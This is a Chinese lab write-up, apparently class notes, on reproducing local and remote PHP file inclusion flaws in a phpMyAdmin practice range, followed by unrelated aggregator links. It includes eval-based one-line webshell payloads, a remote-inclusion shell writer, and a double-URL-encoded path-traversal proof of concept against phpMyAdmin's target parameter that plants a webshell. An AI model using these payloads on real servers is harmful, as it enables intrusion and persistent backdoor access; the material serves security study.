本地文件包含&远程文件包含漏洞复现

2023-05-16

文件包含介绍
服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件，无论这个文件是不是PHP为其后缀，都可以当成PHP执行。这本身并不是漏洞，但是当其以其解析特性讲任意文件当成PHP解析，这时候漏洞就出来了，假如：我们上传一张包含木马的图片，按照它的特性当成PHP解析，这时候漏洞就产生了。感觉主要是其对解析和执行包含的文件未进行辨别和控制和严格过滤造成的。
文件包含分为本地文件包含和远程文件包含；本地文件时包含本地服务器的文件，比如：你上传文件到它服务器，它进行包含和执行，如果文件存在恶意代码它同样会当成PHP进行执行，而远程文件包含可以通过http包含别的地址非本地的文件，如：包含别的服务器的文件进行包含执行。
远程包含如：
<?fputs(fopen(“shell.php”,”w”),”<?php eval($_POST[xxx]);?>”)?>
远程包含如http://192.168.199.110/fileincl/example2.php?page=http://www.xxx.com/xxx.txt
此时在服务器根目录下就会生成shell.php文件，内容为一句话木马
<?php eval($_POST[xxx]);?>
远程文件包含需要PHPstudy的phpini文件中是allow_url_fopen是打开状态，远程文件包含才能用，（默认好像是关闭的）

老师课上还讲了几个可能产生文件包含漏洞的函数：
include():php执行时调用include（）中被包含的文件，文件加载失败或加载错误它虽然报错但是会继续往下执行。
require（）PHP执行前require函数会提取被包含的的文件，如果加载或者调用失败，则整个文件都不执行。
require_once()//include_once()和上面的区别不大，区别主要是这两个函数只能包含一次，不能重复包含。
课上老师再一次提到了这个函数，在条件竞争时讲过file_put_contents(‘2.php’,’<?php eval($_REQUEST[a])?>’);
写一句话木马到2.php
下面靶场演示
http://59.63.200.79:8010/lfi/phpMyAdmin.zip
下载靶场用到的源码导入到审计工具便于审计

上面讲的两个函数容易导致文件包含，这里直接搜索这两个函数试试

点进去看下

发现需要满足条件才能执行到target
if (! empty($_REQUEST[‘target’])
&& is_string($_REQUEST[‘target’])
&& ! preg_match(‘/^index/‘, $_REQUEST[‘target’])
&& ! in_array($_REQUEST[‘target’], $target_blacklist)
&& Core::checkPageValidity($_REQUEST[‘target’])
需要五项都满足条件代码才能顺利执行到我们想让它执行的位置
下面我们逐个追看百度查看查询函数的每个条件怎么满足和函数功能：
(! empty($_REQUEST[‘target’]）///empty()函数功能是检测一个变量是否为空。
is_string($_REQUEST[‘target’])///is_string()检测变量是不是字符串。
! preg_match(‘/^index/‘, $_REQUEST[‘target’])///preg_match()/函数进行正则匹配，匹配REQUEST中的参数是否是以index开头，‘！’是非的意思，在这里面就是不能以index开头。
! in_array($_REQUEST[‘target’], $target_blacklist)///backlist黑名单的意思，in_arrar(1,2)用1跟2进行匹配，匹配到返回true，匹配不到返回false。加了‘！’说面匹配的传参不能是黑名单中的东西。

！

Core::checkPageValidity($_REQUEST[‘target’])///只要满足函数中的条件返回true就可以往下执行。

1必须是白名单中的东西，才能执行，接着往下看条件

2不用看返回的false
3.跟白名单只的东西进行匹配，匹配的传参必须是在白名单内的

4.if中的urldecode意思是url解码 get传参会自动解码一次比如%2527 就是%27 如果加了这个函数就会解析%27 变会解析为’

这里我们可以在白名单中的传参后面加上%2527然后后面加上要包含的文件就可以绕过白名单的检测执行文件包含了
构建参数
root root进行登录

构建poc试试
?target=db_sql.php%253f/../../../../../../../../phpstudy/mysql/data/aaa/abc.frm&a=file_put_contents(‘1.php’,’<?php eval($_REQUEST[a])?>’);

木马成功写入，尝试连接菜刀

连接成功

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

本地文件包含&远程文件包含漏洞复现的相关文章

matlab 数值计算课二阶微分方程-龙格库塔方法 & ODE45

详见mathworks 龙格库塔方法写成矩阵 xff08 状态方程 xff09 的形式更简洁一点 xff08 其实这两种方法结果是一样的 xff0c 如果C是 1 0 0 的话 xff0c 就很明显了 xff09 例如 xff1a 求系统
虚拟化技术介绍 & hypervisor简介

什么是虚拟化 xff1f 虚拟化 xff08 英语 xff1a Virtualization xff09 是一种资源管理技术 xff0c 是将计算机的各种实体资源 xff0c 如服务器网络内存及存储等 xff0c 予以抽象转换后呈现出
Docker 删除&清理镜像

文章首发自个人网站 xff1a https www exception site docker docker delete image 本文中 xff0c 您将学习 Docker 如何删除及清理镜像 xff1f 一通过标签删除镜像通过如
ORB-SLAM3测试：数据集（单目/双目/imu）& ROS (D435 T265)

ORB SLAM3环境配置安装各种依赖库 orb slam3非常友好 xff0c 不用自己下载各种依赖库 xff0c 因为他们全部在thirdParty文件夹中 xff0c 编译orb slam3的同时会自动编译各种依赖库 Eigen3
Linux下rpm&yum&apt-get

RPM简介 RPM命名 RedHat Package Manager xff0c 简称则为RPM 属于Red Hat阵营的 xff0c 与其并列的则是debian centos中大部分我们安装都是使用yum install xff0c 而d
指针p，*p，&p之间的区别

假设我们定义一个指针p 那么会经常使用到三个符号 xff1a 1 xff0c p xff1b p是一个指针变量的名字 xff0c 表示此指针变量指向的内存地址 xff0c 如果使用 p来输出的话 xff0c 它将是一个16进制数 2 xff
shell：重启&&关机

文章目录 shutdownhaltpoweroffrebootinitsync shutdown 关机重启命令 shutdown h 10十分钟后关机shutdown h 0马上关机shutdown h now马上关机shutdown c取
CSU 1333 & Uva 12661 Funny Car Racing【最短路变形+spfa算法，链式前向星建图】

Funny Car Racing Memory Limit 131072KB64bit IO Format lld amp llu Status Description There is a funny car racing in a ci
时空行为检测数据集 JHMDB & UCF101_24 详解

文章目录 0 前言1 JHMDB1 1 基本情况1 2 数据准备以及标签详解 2 UDF101 242 1 基本情况2 2 数据准备与标签详解 3 数据集可视化代码 0 前言现在常用的时空行为检测数据集只有AVA JHMDB UCF101
【浅墨著作】《逐梦旅程：Windows游戏编程之从零开始》勘误&配套源代码下载...

I 39 m back 恩 xff0c 几个月不见 xff0c 大家还好吗 xff1f 这段时间真的好多童鞋在博客里留言说或者发邮件说浅墨你回来继续更新博客吧 woxiangnifrr童鞋说每天都在来浅墨的博客逛一下看有没有更新 xff0c
2013&2014

2013总结 2013 毕业了 xff0c 算是正式工作半年 xff0c 2013年7月开始 xff0c 算是我的生活 xff0c 工作之外的时间都是自己的一收获 1 压力测试差不多算是一个月的时间 xff0c 疯狂的一个月 xff0
AMP:参考xapp-1078和xapp1079的一些建议

Linux系统默认是SMP模式 xff0c 有时我们也需要AMP模式进行开发参考网站 xff1a wiki xilinx com 有xapp1078 xapp1079最新版本的AMP demo www arm com 主要是介绍arm系列
Intel RealSense L515&Unreal Engine 4调试记录

文章目录前言一安装与配置1 安装前置条件2 配置二编译与运行1 编译2 运行填坑与测试1 填坑2 测试前言 Intel RealSense系列推出了适用于Unreal Engine 4的相关插件 xff0c 官网提供了相关示例代
C++中vector作为参数的三种传参方式（传值 && 传引用 && 传指针）

c 43 43 中常用的vector容器作为参数时 xff0c 有三种传参方式 xff0c 分别如下 xff1a function1 vector vec xff0c 传值 function2 vector amp vec xff0c 传引
STM32调试方式JTAG&SWD的区别

在学习STM32时 xff0c 我们经常会遇到JTAG和SWD的调试方法 xff0c 还涉及到Jlink Ulink Stlink等 xff0c JTAG和SWD是ARM板一种调试模式后面三种都是实现这种模式的一种工具 xff0c 他们之
【STM32学习】——串口通信协议&STM32-USART外设&数据帧/输入数据策略/波特率发生器&串口发送/接受实操

文章目录前言一串口通信1 通信接口2 串口通信 xff08 1 xff09 串口简介 xff08 2 xff09 串口硬件电路 xff08 3 xff09 串口软件部分二 STM32的USART外设1 USART简介2 图示详解三
【STM32学习】——USART串口数据包&HEX/文本数据包&收发流程&串口收发HEX/文本数据包实操

文章目录前言一数据包格式 xff08 江科大规定 xff09 1 HEX数据包2 文本数据包3 两者对比二数据包收发流程1 HEX数据包接收 xff08 只演示固定包长 xff09 2 文本数据包接收 xff08 只演示可变包长 x
Oracle获取日期&天数

一获取当年所有日期 span class token comment select from span span class token keyword select span trunc span class token punctua
最简单的 DRM 应用 & drm设备不工作

https zhuanlan zhihu com p 341895843 https zhuanlan zhihu com p 75321245 编写最简单的 DRM 应用主程序 xff1a int main int argc char
超声波传感器(CH101&ch201) - Ⅱ

文章目录 1 前言 2 目前官方发布的Horn有以下几种 3 超声波TOF传感器 VS 红外线传感器 4 开发评估套件 1 前言上一篇简单的引入了CH101 CH201 这两种传感器这种传感器使用的时候除了需要芯片外还需要一个声学的

随机推荐

链表：头插法与尾插法（简易图解和代码）

头插法定义 xff1a 输入的数据次序生成的链表节点次序相反 xff0c 例如 xff1a 按1 2 3顺序进行头插之后 xff0c 最终排序却变成了3 2 1 简而言之就是逆序插入定义图解 xff1a 代码图解 xff1a 代码 xf
Robomaster基于传统算法的视觉识别教程

文章目录前言一装甲板的分析二预处理降低曝光度ROI区域三颜色提取提取目标颜色阈值化与膨胀四灯条轮廓提取五灯柱筛选六灯柱匹配其他总结前言本文记载个人在RM视觉组中学习到的传统算法和opencv用法及代码实例讲解 xff0
基础爬虫实战案例之获取游戏商品数据

文章目录前言一爬虫是什么 xff1f 二爬虫实战案例1 引入库2 请求网页处理3 生成访问链接4 读入数据到mongodb5 获得数据6 加入多线程总结前言在想获取网站的一些数据时 xff0c 能过人工手动复制和粘贴 xff0c
软考下午科目——第三章——UML分析与设计

UML分析与设计大纲要求 xff1a 学会面向对象的分析与设计 xff0c 掌握UML描述方法 UML基础知识面向对象的分析与设计面向对象方法是一种运用对象类继承封装聚合关联消息多态性等概念来构造系统的软件开发方法面向
Git出现Unable to create 'E:/xxx/.git/index.lock': File exists.的解决办法

初次使用git xff0c 在执行完 34 git add readme txt 34 命令后 xff0c 在执行commit时 xff0c 由于命令写错 xff0c 没有写提交日志 xff0c 再次更正提交就出现上述错误 xff1a Un
输入一个字符串，将其逆序输出。

输入一个字符串 xff0c 将其逆序输出输入提示信息 xff1a Please Enter String1 n 输入字符串用gets 输出提示信息和输出格式 xff1a Result is n s n include lt stdio h
利用一个字符数组作函数参数,实现字符串的逆序存放

利用一个字符数组作函数参数实现字符串 xff08 最大长度为80个字符 xff09 的逆序存放要求如下 xff1a 1 在子函数Inverse中实现字符串的逆序存放函数原型为 xff1a void Inverse char str 2
输入一个以回车结束的字符串（少于10个字符），它由数字字符组成，将该字符串转换成整数后输出。

输入一个以回车结束的字符串 xff08 少于10个字符 xff09 xff0c 它由数字字符组成 xff0c 将该字符串转换成整数后输出注意 xff0c 不能直接调用库函数atoi完成输入提示信息 xff1a 34 Enter a st
从键盘任意输入一个字符串，计算其实际字符个数并打印输出，即不使用字符串处理函数strlen()编程实现strlen()的功能。

从键盘任意输入一个字符串 xff0c 计算其实际字符个数并打印输出 xff0c 即不使用字符串处理函数strlen 编程实现strlen 的功能输入格式要求 xff1a gets 提示信息 xff1a Please enter a str
从键盘输入某年某月（包括闰年），编程输出该年的该月拥有的天数

从键盘输入某年某月 xff08 包括闰年 xff09 xff0c 编程输出该年的该月拥有的天数输入格式要求 xff1a 34 d d 34 提示信息 xff1a Input year month The number of days is
编程计算2×3阶矩阵A和3×2阶矩阵B之积C。

编程计算2 3阶矩阵A和3 2阶矩阵B之积C 矩阵相乘的基本方法是 xff1a 矩阵A的第i行的所有元素同矩阵B第j列的所有元素对应相乘 xff0c 并把相乘的结果相加 xff0c 最终得到的值就是矩阵C的第i行第j列的值要求 xff1a
【成长记录】素数

所谓素数是指这个数只能被1和自身整除要求在主函数输入一个数 xff0c 调用函数Fun 判断该数是否是素数打印信息在主函数中进行例如 xff1a 从键盘输入5 xff0c 5是素数则打印如下信息 xff1a 5 is a prime
【刷题记录】第10章实验1：学生成绩管理系统V3.0

第10章实验1 xff1a 学生成绩管理系统V3 0 某班有最多不超过30人 xff08 具体人数由键盘输入 xff09 参加某门课程的考试 xff0c 参考第11周在线测验中学生成绩管理系统V2 0 xff0c 用二维字符数组作函数参
图像处理中的uint8与float32之间的转换

span class token comment 预处理 span span class token keyword def span span class token function pre process span span clas
在AI Studio Notebook中进行持久化安装

使用持久化路径 mkdir span class token operator span home span class token operator span aistudio span class token operator span
【python】自动化ffmpeg推rtmp流 + 进程停止

一诉求原因 xff1a ffmpeg命令可实现自动化推流 xff0c 一般在执行之后 xff0c 由于python的自上而下执行 xff0c 后续代码逻辑无法执行场景1 xff1a 需要给两个rtmp地址轮询推流 xff0c 但希望视
解决github能正常访问，但是ping不通，也无法进行git操作的问题

最近发现 xff0c 只要是跟github有关的下载操作都无法正常进行于是试图进行解决 xff0c 解决方案如下 xff1a 打开github动态地址 xff0c 查询github的动态IP地址找到hosts文件 xff0c 以管理员身份
利用Git LFS上传大文件到github

在本地打开命令行或终端 xff0c 使用以下命令将 GitHub 仓库克隆到本地 xff1a span class token function git span clone https github com yaojingchi test
github在线查看代码&运行的方法

github在线运行在地址栏的github com前面加上gitpod io 例如原来地址为 https github com xxxxx xxxx 将地址栏的github com改为github dev https gitpod io
本地文件包含&远程文件包含漏洞复现

文件包含介绍服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件 xff0c 无论这个文件是不是PHP为其后缀 xff0c 都可以当成PHP执行这本身并不是漏洞 xff0c 但是当其以其解析特性讲任意文件当成PHP解析 xff0

本地文件包含&远程文件包含漏洞复现

本地文件包含&远程文件包含漏洞复现 的相关文章

随机推荐

热门标签

本地文件包含&远程文件包含漏洞复现的相关文章